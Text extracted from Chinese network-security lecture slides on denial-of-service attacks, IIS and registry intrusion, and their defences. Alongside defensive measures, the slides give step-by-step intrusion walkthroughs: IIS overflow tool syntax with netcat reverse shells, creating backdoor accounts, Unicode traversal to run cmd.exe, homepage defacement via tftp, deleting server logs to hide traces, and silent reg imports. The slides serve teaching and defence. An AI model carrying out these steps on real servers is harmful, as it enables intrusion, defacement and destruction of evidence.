第3章拒絕服務(wù)與數(shù)據(jù)庫安全2

第3章拒絕服務(wù)與數(shù)據(jù)庫安全DoS攻擊原理DoS攻擊工具的基本使用和防護(hù)基于漏洞的入侵和防護(hù)SQL數(shù)據(jù)庫的安全和原理基于SQL的入侵和防護(hù)第一頁，共七十一頁。3.1拒絕服務(wù)DOS定義拒絕服務(wù)攻擊的分類常見DOS攻擊

分布式拒絕服務(wù)拒絕服務(wù)攻擊的防護(hù)第二頁，共七十一頁。DOS的定義拒絕服務(wù)（Denialofservice）阻止或拒絕合法使用者存取網(wǎng)絡(luò)服務(wù)器的一種破壞性工具。將大量的非法申請封包傳送給指定目標(biāo)主機(jī)，完全消耗目標(biāo)主機(jī)資源，使系統(tǒng)無法使用。第三頁，共七十一頁。DOS的原理原理借助網(wǎng)絡(luò)系統(tǒng)或協(xié)議的缺陷和配置漏洞進(jìn)行網(wǎng)絡(luò)攻擊，使網(wǎng)絡(luò)擁塞、系統(tǒng)資源耗盡或系統(tǒng)應(yīng)用死鎖，妨礙目標(biāo)主機(jī)和網(wǎng)絡(luò)系統(tǒng)對正常用戶服務(wù)請求的及時響應(yīng)，造成服務(wù)的性能受損甚至導(dǎo)致服務(wù)中斷。第四頁，共七十一頁。DOS的攻擊過程第五頁，共七十一頁。DOS的攻擊思想和方法思想：服務(wù)器的緩沖區(qū)滿，不接受新的請求。使用IP欺騙，迫使服務(wù)器將合法用戶的連接復(fù)位。方法：資源消耗服務(wù)中止物理破壞第六頁，共七十一頁。DOS的攻擊分類物理形式和邏輯形式按攻擊的目標(biāo)節(jié)點型主機(jī)型攻擊應(yīng)用型攻擊網(wǎng)絡(luò)連接型按照攻擊方式資源消耗服務(wù)中止物理破壞按受害者類型服務(wù)器端拒絕服務(wù)攻擊客戶端拒絕服務(wù)攻擊第七頁，共七十一頁。常見的DOS攻擊Land程序攻擊SYNFlood攻擊IP欺騙DoS攻擊Smurf攻擊PingofDeathTeardrop攻擊WinNuke攻擊

第八頁，共七十一頁。分布式拒絕服務(wù)（DDOS）DDoS攻擊分為：攻擊者、主控端和代理端第九頁，共七十一頁。DDOS工具TrinooTFNTFN2KStacheldraht獨裁者DDoS攻擊器第十頁，共七十一頁。DOS攻擊的防護(hù)（一）根據(jù)異常情況分析使用DDoS檢測工具防護(hù)措施從四個方面下手：從網(wǎng)絡(luò)流量中精確的區(qū)分攻擊流量并阻斷然后檢測發(fā)現(xiàn)攻擊，降低攻擊對服務(wù)的影響在網(wǎng)絡(luò)多個邊界進(jìn)行部署，阻斷內(nèi)外不同類型的攻擊最后保障網(wǎng)絡(luò)系統(tǒng)具備很強的擴(kuò)展性和良好的可靠性第十一頁，共七十一頁。DOS攻擊的防護(hù)（二）防護(hù)措施：增加網(wǎng)絡(luò)核心設(shè)備的冗余性通過路由器配置訪問列表過濾掉非法流量部署防火墻，提高網(wǎng)絡(luò)抵御網(wǎng)絡(luò)攻擊的能力部署入侵檢測設(shè)備，提高對不斷更新的DOS攻擊的識別和控制能力第十二頁，共七十一頁。3.2基于漏洞的入侵和防護(hù)基于IIS漏洞的入侵和防護(hù)基于電子郵件服務(wù)的入侵和防護(hù)基于注冊表的入侵和防護(hù)基于Telnet的入侵和防護(hù)第十三頁，共七十一頁。IIS漏洞概述IIS（InternetInformationServer），即Internet信息服務(wù)器，它在Windows系統(tǒng)中提供Internet服務(wù)，例如Web服務(wù)、FTP服務(wù)、SMTP服務(wù)等。IIS服務(wù)器在方便用戶使用的同時，帶來了許多安全隱患。IIS漏洞有近千余種，其中能被用來入侵的漏洞大多數(shù)屬于“溢出”型漏洞。對于溢出型漏洞，入侵者可以通過發(fā)送特定指令格式的數(shù)據(jù)使遠(yuǎn)程服務(wù)區(qū)的緩沖區(qū)溢出，從而突破系統(tǒng)的保護(hù)，在溢出的空間中執(zhí)行任意指令。第十四頁，共七十一頁。主要的IIS漏洞.ida&.idq漏洞.Printer漏洞Unicode漏洞.asp映射分塊編碼漏洞WebDAV漏洞第十五頁，共七十一頁。IIS漏洞信息的搜集使用掃描軟件掃描存在漏洞的主機(jī)，例如使用X-Scan進(jìn)行IIS漏洞的掃描使用telnettargetIP80搜集Web服務(wù)器版本信息第十六頁，共七十一頁。.ida&.idq漏洞微軟的IndexServer可以加快Web的搜索能力，提供對管理員腳本河Internet數(shù)據(jù)的查詢，默認(rèn)支持管理腳本.ida和查詢腳本.idq。管理腳本.ida和查詢腳本.idq都是使用idq.dll來進(jìn)行解析的。idq.dll存在一個緩沖溢出，問題存在于idq.dll擴(kuò)展程序上，由于沒有對用戶提交的輸入?yún)?shù)進(jìn)行邊界檢查，可以導(dǎo)致遠(yuǎn)程攻擊者利用溢出來獲得System權(quán)限訪問遠(yuǎn)程系統(tǒng)。第十七頁，共七十一頁。.ida&.idq漏洞的檢測第十八頁，共七十一頁。IDQ入侵工具—IISIDQIISIDQ有命令行和圖形界面兩種方式。使用IISIDQ攻擊遠(yuǎn)程服務(wù)器后，有兩種登錄方式：攻擊后主動連接方式命令

iisidq.exe<操作系統(tǒng)類型><目標(biāo)IP><Web端口><1><端口監(jiān)聽端口>[輸入命令1]攻擊后監(jiān)聽遠(yuǎn)程服務(wù)器連接命令iisidq.exe<操作系統(tǒng)類型><目標(biāo)IP><Web端口><2><溢出連接IP><溢出連接端口>[輸入命令1]如果不寫輸入命令，默認(rèn)命令為cmd.exe/c+dir。如果使用1，表示不使用默認(rèn)命令而是要用戶輸入命令。第十九頁，共七十一頁。IISIDQ支持的操作系統(tǒng)類型0IIS5中文Win2000Sp01IIS5中文Win2000Sp12IIS5中文Win2000Sp2第二十頁，共七十一頁。漏洞溢出連接工具-NCnc在網(wǎng)絡(luò)工具中有“瑞士軍刀”的美譽，通過nc，入侵者可以方便的連接遠(yuǎn)程服務(wù)器。nc有兩種方法進(jìn)行連接主動連接到外部：nc[-options]hostnameport[s][ports]監(jiān)聽等待外部連接：nc-l-pport[-option][hostname][port]第二十一頁，共七十一頁。NC的使用參數(shù)說明-e:prog程序重定向，一旦連接，就執(zhí)行-g:網(wǎng)關(guān)路由跳數(shù),可設(shè)置到8-h：幫助信息-i：secs延時的間隔-l：監(jiān)聽模式，用于入站連接-n：指定數(shù)字的IP地址，不能用hostname-o：file記錄16進(jìn)制的傳輸-p：port本地端口號-r：任意指定本地及遠(yuǎn)程端口-s：addr本地源地址-u：UDP模式-v：詳細(xì)輸出（用兩個-v可得到更詳細(xì)的內(nèi)容）-w：secs超時時間-z：將輸入輸出關(guān)掉——用于掃描時第二十二頁，共七十一頁。.idq入侵實例（一）步驟一：掃描遠(yuǎn)程服務(wù)器步驟二：IDQ溢出。使用連接方式一進(jìn)行idq漏洞溢出。使用的命令為iisidq006801521第二十三頁，共七十一頁。.idq入侵實例（一）步驟三：使用nc進(jìn)行連接。使用命令nc–v06521。第二十四頁，共七十一頁。.idq入侵實例（一）步驟四：建立后門帳號步驟五：使用exit命令斷開連接比較命令如圖所示第二十五頁，共七十一頁。.idq入侵實例（二）步驟一：掃描遠(yuǎn)程服務(wù)器步驟二：使用nc在本地打開端口等待連接。使用命令nc-l–p250。參數(shù)-l表示使用監(jiān)聽模式，-p表示設(shè)置本地監(jiān)聽端口250

第二十六頁，共七十一頁。.idq入侵實例（二）步驟三：IDQ溢出。使用命令iisidq006802002501采用方式二進(jìn)行溢出，使遠(yuǎn)程服務(wù)器溢出后自動連接到本地計算機(jī)的250端口第二十七頁，共七十一頁。.idq入侵實例（二）步驟四：進(jìn)行溢出后的攻擊步驟五：建立后門帳號步驟六：使用exit命令斷開連接第二十八頁，共七十一頁。IISIDQ的圖形界面第二十九頁，共七十一頁。.printer漏洞windows2000IIS5存在打印擴(kuò)展ISAPI（InternetServiceApplicationProgrammingInterface），使得.printer擴(kuò)展與msw3prt.dll進(jìn)行映射，該擴(kuò)展可以通過Web調(diào)用打印機(jī)。在msw3prt.dll中存在緩沖區(qū)溢出漏洞。微軟建議，一般在未打補丁之前，一定要移除ISAPI網(wǎng)絡(luò)打印的映射。第三十頁，共七十一頁。.printer漏洞入侵步驟一：使用nc監(jiān)聽端口步驟二：使用IIS5Exploit進(jìn)行漏洞溢出，命令格式IIS5Exploit<目標(biāo)IP><入侵者IP><本地監(jiān)聽端口>第三十一頁，共七十一頁。Unicode目錄遍歷漏洞微軟IIS4.0和5.0都存在利用擴(kuò)展Unicode字符取代“/”和“\”，從而可以利用“../”目錄遍歷的漏洞該漏洞帳號默認(rèn)情況下屬于Everyone和Users組的成員，因此任何與Web根目錄在同一邏輯分區(qū)上的能被這些組訪問的文件都能被刪除，修改或執(zhí)行入侵者不能像使用.ida和.idq漏洞那樣，直接溢出一個擁有管理員權(quán)限的shell，而只是具有IUSR_machinename權(quán)限，也就是說，只能進(jìn)行簡單的文件操作。使用Unicode構(gòu)造“/”和“\”字符舉例%c1%1c—>(0xc1-0xc0)*0x40+0x1c=0x5c=‘/’%c0%2f—>(0xc0-0xc0)*0x40+0x2f=0x2f=‘\’第三十二頁，共七十一頁。手工檢測漏洞遠(yuǎn)程系統(tǒng)Windows2000server中文版在地址欄輸入：:\”第三十三頁，共七十一頁。命令說明命令中的“+”，代表空格06遠(yuǎn)程服務(wù)器IP地址scripts為遠(yuǎn)程服務(wù)器上的腳本文件目錄“..%c1%1c..”被遠(yuǎn)程服務(wù)器譯為“../”winnt/system32/cmd.exe?/c+打開遠(yuǎn)程服務(wù)器的cmd.exe，一般不用改變dir+c:\入侵者要執(zhí)行的命令利用此命令，入侵者將IE編程了遠(yuǎn)程命令的控制臺第三十四頁，共七十一頁。Unicode入侵實例—涂鴉主頁步驟一：準(zhǔn)備標(biāo)語主頁，并保存成index.htm步驟二：探知遠(yuǎn)程服務(wù)器的Web根目錄方法一：利用.ida或者.idq漏洞。方法二：輸入:\mmc.gif/s其中，/s表示在dir命令后查找指定文件或文件夾的物理路徑，mmc.gif是默認(rèn)安裝在Web根目錄中的，找到該文件的同時，也就找到了Web根目錄。第三十五頁，共七十一頁。Unicode入侵實例—涂鴉主頁步驟三：涂鴉主頁。在地址欄中使用Unicode漏洞查詢Web服務(wù)器主頁，假設(shè)是index.htm。使用tftp將自己做好的主頁替換掉原Web服務(wù)器的主頁。tftp的使用tftp只要執(zhí)行t，本計算機(jī)就成為一臺tftp服務(wù)器使用windows自帶的tftp命令便可以在該服務(wù)器上傳和下載文件使用方法:tftp[-i]host[GET/PUT]source[destination]-i 二進(jìn)制文件傳輸host tftp服務(wù)器地址Get 下載文件PUT 上傳文件source 文件名destination 目的地第三十六頁，共七十一頁。Unicode入侵實例—涂鴉主頁第三十七頁，共七十一頁。Unicode入侵實例—涂鴉主頁第三十八頁，共七十一頁。Unicode漏洞的實例二—擦腳印通過Unicode漏洞進(jìn)入遠(yuǎn)程服務(wù)器后，肯定會在該服務(wù)器上留下自己的ip，為了隱藏自己，通常需要清除服務(wù)器的日志，這種做法叫作擦腳印。del+c:\winnt\system32\logfiles\*.*del+c:\winnt\system32\confige\*.evtdel+c:\winnt\system32\dtclog\*.*del+c:\winnt\system32\*.logdel+c:\winnt\system32\*.txtdel+c:\winnt\*.txtdel+c:\winnt\*.logUnicode獲得的權(quán)限較低，一般無法執(zhí)行bat文件。第三十九頁，共七十一頁。Unicode漏洞實例三—修改文件屬性入侵過程中，入侵者通常希望隱藏自己的文件。如果上傳的文件設(shè)置成“隱藏”加“系統(tǒng)”屬性，就可以避免被發(fā)現(xiàn)。Attrib命令的使用：Attrib[+R|-R][+A|-A][+S|-S][+H|-H][[drive:][path]][/S/D]+:設(shè)置屬性-:清除屬性R:只讀文件屬性A：存檔文件屬性S：系統(tǒng)文件屬性H：隱藏文件屬性/S：處理當(dāng)前文件夾及其子文件夾中的匹配文件/D：處理文件夾。第四十頁，共七十一頁。Unicode漏洞實例三—修改文件屬性如果要把c盤中的abc.exe設(shè)置成“系統(tǒng)”加“隱藏”屬性，使用命令“attrib.exe+%2bH+%2bS+c:\abc.exe”其中，“%2b”表示“+”號。類似，要取消掉隱藏和系統(tǒng)屬性，使用命令“attrib.exe+-H+-S+c:\abc.exe”。第四十一頁，共七十一頁。.ASP映射分塊編碼漏洞Windows2000和NT4IIS.asp映射存在遠(yuǎn)程緩沖溢出漏洞。ASPISAPI過濾器默認(rèn)在所有NT4和WIN2000系統(tǒng)中裝載，存在的漏洞可以導(dǎo)致遠(yuǎn)程執(zhí)行任意命令。惡意攻擊者可以使用分塊編碼形式數(shù)據(jù)給IIS服務(wù)器，當(dāng)解碼和解析這些數(shù)據(jù)的時候可以強迫IIS把入侵者提供的數(shù)據(jù)寫到內(nèi)存任意位置。通過此漏洞可以導(dǎo)致WIN2000系統(tǒng)產(chǎn)生緩沖溢出并以IWAM_computer_name用戶的權(quán)限執(zhí)行任意代碼，而在WINDOWSNT4下可以以system的權(quán)限執(zhí)行任意代碼。第四十二頁，共七十一頁。.ASP映射分塊編碼漏洞使用工具：IISASP.DLLOVERFLOWPROGRAM2.0Aspcode使用方法：aspcode<server>[aspfile][webport][winxp]或aspcode<server>參數(shù)說明：<server>:遠(yuǎn)程服務(wù)器[aspfile]:遠(yuǎn)程服務(wù)器上ASP文件所在的路徑。[Webport]:遠(yuǎn)程服務(wù)器web服務(wù)端口。[winxp]:winxp模式。第四十三頁，共七十一頁。WebDAV遠(yuǎn)程緩沖區(qū)漏洞Microsoft5.0帶有WebDav組件對用戶輸入的傳遞給ntdll.dll程序處理的請求未做充分的邊界檢查，遠(yuǎn)程入侵者可以向WebDav提交一個精心構(gòu)造的超長數(shù)據(jù)請求而導(dǎo)致緩沖區(qū)溢出，使得入侵者以LocalSystem權(quán)限在主機(jī)上執(zhí)行任意指令。漏洞檢測工具WebDavScan

第四十四頁，共七十一頁。WebDAV遠(yuǎn)程緩沖區(qū)漏洞漏洞利用工具wd0.3-en.exe：英文版IIS溢出工具，與nc配合使用BIG5.exe：繁體版IIS溢出工具Webdavx3：中文版IIS溢出工具，溢出后打開7788端口等待連接WebDAV：突破防火墻的WebDAV溢出工具第四十五頁，共七十一頁。IIS6.0Web安全漏洞解決方案轉(zhuǎn)移Web根目錄設(shè)置IIS目錄的權(quán)限為只讀刪除全部默認(rèn)安裝目錄，并禁止任何腳本、應(yīng)用程序執(zhí)行，并刪除應(yīng)用程序配置里面的“ISAPI”應(yīng)用程序、禁止腳本測試等。設(shè)置安全日志并存在安全的路徑下。安裝網(wǎng)絡(luò)防火墻，并禁用除80端口以外所有端口的內(nèi)外通信連接。備份文件并保存。第四十六頁，共七十一頁?；陔娮余]件的漏洞IMAP和POP漏洞拒絕服務(wù)（DoS）攻擊系統(tǒng)配置漏洞默認(rèn)配置空的/默認(rèn)根密碼漏洞創(chuàng)建利用軟件問題緩沖區(qū)溢出意外組合未處理的輸入利用人為因素特洛伊木馬及自我傳播遠(yuǎn)程訪問數(shù)據(jù)發(fā)送破壞拒絕服務(wù)代理第四十七頁，共七十一頁?；陔娮余]件漏洞的解決方案在電子郵件系統(tǒng)周圍鎖定電子郵件系統(tǒng)—電子郵件系統(tǒng)周邊控制開始于電子郵件網(wǎng)關(guān)的部署。確保外部系統(tǒng)訪問的安全性—電子郵件安全網(wǎng)關(guān)必須負(fù)責(zé)處理來自所有外部系統(tǒng)的通信，并確保通過的信息流量是合法的。實時監(jiān)視電子郵件流量—實時監(jiān)視電子郵件流量對于防止黑客利用電子郵件訪問內(nèi)部系統(tǒng)是至關(guān)重要的。

電子郵件安全網(wǎng)關(guān)能夠輕松集成，并被使用者輕松配置。第四十八頁，共七十一頁。注冊表的入侵在早期的DOS系統(tǒng)中，系統(tǒng)通過使用BAT文件來為DOS系統(tǒng)加載驅(qū)動程序。Windwos3.x中，系統(tǒng)通過Win.ini、System.ini、Control.ini、program.ini等INI文件來保存操作系統(tǒng)的軟、硬件的配置信息和驅(qū)動程序（INI文件最大64KB）。從Windows95開始，通過注冊表，用戶便可以輕易的添加、刪除、修改系統(tǒng)內(nèi)的軟、硬件配置信息和驅(qū)動程序。第四十九頁，共七十一頁。注冊表的分層結(jié)構(gòu)第五十頁，共七十一頁。開啟遠(yuǎn)程主機(jī)的注冊表入侵者通過遠(yuǎn)程控制和入侵注冊表需要的條件建立IPC$連接開啟遠(yuǎn)程注冊表服務(wù)第五十一頁，共七十一頁。開啟遠(yuǎn)程主機(jī)的注冊表開啟遠(yuǎn)程注冊表服務(wù)的過程如下：建立IPC$連接打開“計算機(jī)管理”，用“計算機(jī)管理”管理遠(yuǎn)程計算機(jī)開啟遠(yuǎn)程注冊表服務(wù)關(guān)閉“計算機(jī)管理”，斷開IPC$連接第五十二頁，共七十一頁。連接遠(yuǎn)程主機(jī)的注冊表入侵者可以通過Windows自帶的工具連接遠(yuǎn)程主機(jī)的注冊表并進(jìn)行修改。步驟一：執(zhí)行regedit來打開注冊表編輯器步驟二：建立IPC$連接步驟三：連接遠(yuǎn)程主機(jī)注冊表（選擇“注冊表”—”連接網(wǎng)絡(luò)注冊表”）步驟四：斷開網(wǎng)絡(luò)注冊表第五十三頁，共七十一頁。注冊表reg文件的編輯入侵者除了使用注冊表編輯器編輯注冊表外，還可以通過手工倒入reg文件修改遠(yuǎn)程主機(jī)的注冊表。reg文件是Windows系統(tǒng)中一種特定格式的文本文件，它是為注冊表的信息編輯而設(shè)計的文件。通過reg可以修改注冊表的任意一項，但是通過網(wǎng)絡(luò)連接珠冊表編輯器一般只能看到三個根項。第五十四頁，共七十一頁。使用reg文件修改注冊表實例步驟一：打開記事本，然后編輯添加主鍵，在記事本中寫入：REGEDIT4[HKEY_CURRENT_USERS\Software\HACK]第五十五頁，共七十一頁。使用reg文件修改注冊表實例步驟二：保存文件為test1.reg，雙擊該文件，便建立了HACK主鍵。第五十六頁，共七十一頁。使用reg文件修改注冊表實例步驟三：為HACK主鍵建立一個名字為“NAME”，類型為“DWORD”，值為“00000000”的鍵值項。步驟四：打開記事本，寫入：REGEDIT4[HKEY_CURRENT_USER\Software\HACK]“NAME”=dword:00000000保存為TEST2.REG文件，然后雙擊導(dǎo)入。第五十七頁，共七十一頁。使用reg文件修改注冊表實例步驟五：刪除鍵值項REGEDIT4[HKEY_CURRENT_USER\Software\HACK]“NAME”=-步驟六：刪除主鍵REGEDIT4[-HKEY_CURRENT_USERS\Software\HACK]第五十八頁，共七十一頁。命令行導(dǎo)入上面實例中通過雙擊導(dǎo)入注冊表，容易被遠(yuǎn)程主機(jī)管理員發(fā)現(xiàn)，因為每次導(dǎo)入都會有提示對話框第五十九頁，共七十一頁。命令行導(dǎo)入通過命令行倒入使用專門的注冊表導(dǎo)入工具使用windows系統(tǒng)自帶的導(dǎo)入工具windows自帶的導(dǎo)入工具使用命令：regedit/s<reg文件>regedit是系統(tǒng)自帶的命令，不使用任何工具。/s表示不需要詢問，直接倒入第六十頁，共七十一頁。Telnet入侵的防護(hù)方法禁用Telnet服務(wù)。防范IPC漏洞，禁用建立空連接打開注冊表編輯器，找到子項HKEY_LOCAL_MACHINE\SYSTEM\

CurrentControlSet\Control\LSA，把RestrictAnonymous=DWORD的鍵值改為：00000001。第六十一頁，共七十一頁。3.3SQL數(shù)據(jù)庫安全